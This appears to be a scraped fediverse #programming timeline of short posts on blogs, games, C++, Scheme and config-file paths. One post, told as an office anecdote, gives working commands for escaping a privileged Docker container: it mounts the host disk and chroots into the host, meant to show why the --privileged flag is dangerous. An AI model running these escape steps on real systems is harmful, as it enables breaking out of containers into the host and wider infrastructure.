New post on my blog, a quick one: "Honor Your Projects".
No matter how big or small, your projects matter. Honor them 
Ariadna's Blog · Honor Your Projects
More from 
Ariadna Vigo
Administered by:
#programming
284 posts228 participants14 posts today
We're writing a mini version of Rust, in Rust! Just chugging through some tidy-ups in this video:
Interesting video: "Inventory UI: Grid vs. List" https://www.youtube.com/watch?v=0O19mDanbJM
A grumpy ItSec guy walks through the office when an exchange of words reaches his ears.
Dev0: Hey, this isn't working, I hate containers...
Dev1: Maybe just add the --privileged flag!
ItSec: Just… no. Simply no. No privileged mode - the grumpy fellow interjects as he walks away.
Dev0: Jesus, fine - no privileged mode.
Dev1: Okay, but… why?
Here's why (one, simple example):
Docker's --privileged flag lifts almost all restrictions from your container - exactly the opposite of --cap-drop=ALL. Let's demo the difference.
1) Start two containers.
docker run -itd --privileged --name ubuntu-privileged ubuntu
docker run -itd --name ubuntu-unprivileged ubuntu
2) Inspect /dev in the unprivileged container.
docker exec -it ubuntu-unprivileged bash
ls /dev
exit
You'll only see a limited set of devices. No disk access.
3) Now inspect /dev in the privileged container.
docker exec -it ubuntu-privileged bash
ls /dev
/dev/sda exposed! Sometimes you may see /dev/mapper when LVM is in place. Then "apt update && apt install -y lvm2" and "lvscan" may help during next phase.
4) Exploitation part (inside the privileged container) - simply mount mount /dev/sda to any writable path in container.
mkdir /tmp/whatever
mount /dev/sda1 /tmp/whatever
5) You can now enumerate - and access - the Docker host's logical volume.
ls -la /tmp/whatever
6) If you wish, you can even chroot into the host:
chroot /tmp/whatever /bin/bash
The moral of the story is to avoid privileged mode, because in the event of an incident (e.g. an attacker compromising an app running inside a container), you significantly increase the likelihood of successful lateral movement from the container to the Docker host - and from there into the rest of your infrastructure.
Usually the grumpy guy means well. He just doesn't know how to explain it properly.
From: blenderdumbass . org
The story of the First Year of development of Dani's Race.
Read: https://blenderdumbass.org/videos/peertube___dani_s_race___first_year_of_development
blenderdumbass . orgPeerTube | Dani's Race | First Year of Development
More from 
Blender Dumbass ( J.Y.Amihud )
Get Early Access To ACCU Spring Conference Videos
The ACCU Spring Conference is one of the most respected in the coding world.
Get early access to videos from the 2025 conference by joining ACCU today!
https://accu.org/menu-overviews/membership/
accu.orgMembership InformationACCU - professionalism in programming
From: blenderdumbass . org
The multiplayer, or the lack there of, at the moment is so utterly broken and so lacking of being properly made that for a long time, I was just not bothering with it. Seeing it as something unnecessary. Something that does not need to be touched, because other things, like the...
Read or listen: https://blenderdumbass.org/articles/a_rant_about_making_a_multiplayer_game
blenderdumbass . orgA Rant About Making a Multiplayer Game
More from Blender Dumbass ( J.Y.Amihud )
Chris Randall – floats on air
#Electronic #IDM #Phoenix #experimentalelectronic #mellow #programming #progressivehouse #synthesizer #techno
CC BY-NC-ND (#CreativeCommons Attribution Non Commercial No Derivatives) #ccmusic
https://chrisrandall.bandcamp.com/album/floats-on-air
DX.
Why did it take me so long to think of DX instead of trying to say "you know, UX but for library APIs"
Now I can just say: Hey FontConfig, you have terrible DX!
(I have long pushed on the idea that design is a required skill for programming *code*, not just GUIs or even CLIs, but the code itself should be designed too)
Playing around with Scheme again, encouraged by @jjba23... and wow... those old feelings 
I may start a project in (Guile) Scheme just to write some code in something different. I hear ideas (be reasonable though 
)
When your program reads a configuration file, and that configuration file contains paths to other files, those paths need to be resolved relative to the parent of the realpath() of the configuration file!
In particular, do not:
* Resolve them against the current working directory of the process
* Forget to realpath() (that is, resolve symbolic links in) the path to the configuration file
This has been a public service announcement.
What is WhatsApp made of? 
Zoom: https://nubecolectiva.com/comunidad/flyers/whatsapp-technologies/
¿Con Qué Esta Hecho WhatsApp? 
Zoom: https://nubecolectiva.com/comunidad/flyers/tecnologias-de-whatsapp/
I don't get these messages often, just sometimes, but I love it when I do!!
Two major AI coding tools wiped out user data after making cascading mistakes https://arstechni.ca/DLdP #largelanguagemodels #AIdevelopmenttools #AIconfabulation #AIhallucination #machinelearning #confabulations #AIdevelopment #AIassistants #generativeai #multimodalAI #datascience #JasonLemkin #Programming #AIbehavior #AIfailures #vibecoding #GeminiCLI #AIcoding #chatbots #Biz&IT #google #Replit #AI
Ars Technica · Two major AI coding tools wiped out user data after making cascading mistakes
Uh. Why does initializing a C++ 'std::array' with an initializer list work differently from initializing a 'std::vector' or a C array with an initializer list?
For the std::array, the compiler complains that it can't initialize a pair from an int, as if it treats '{1, 2}' as its own array. It works with an extra pair of braces that's not necessary for std::vector and C arrays.
What dark corner of C++ initialization rules have I missed
How to Subtract in the Go Programming Language.
Cómo Restar En El Lenguaje de Programación Go.
https://nubecolectiva.com/blog/como-restar-en-el-lenguaje-de-programacion-go/
The Syntax and The Shredding Blog: Episode 4: CF's Revenge
My Adobe CF Hackathon but expanded to the next steps of creating a GRC plan while listening to The Kovenant's The Sulpher Feast.
https://wadebach.blackcatwhitehatsecurity.com/blog.cfm#podcast4
#Syntax #Shredding #Blog #Episode4 #Programming #CFML
Vintage Macintosh Programming Book Library
In the vein of some of the stuff I’ve been doing recently, this is a great resource for people interested in vintage Mac programming, including the original Think Pascal and Think (...)
#mac #nostalgia #programming #resources #retrocomputing #vintage
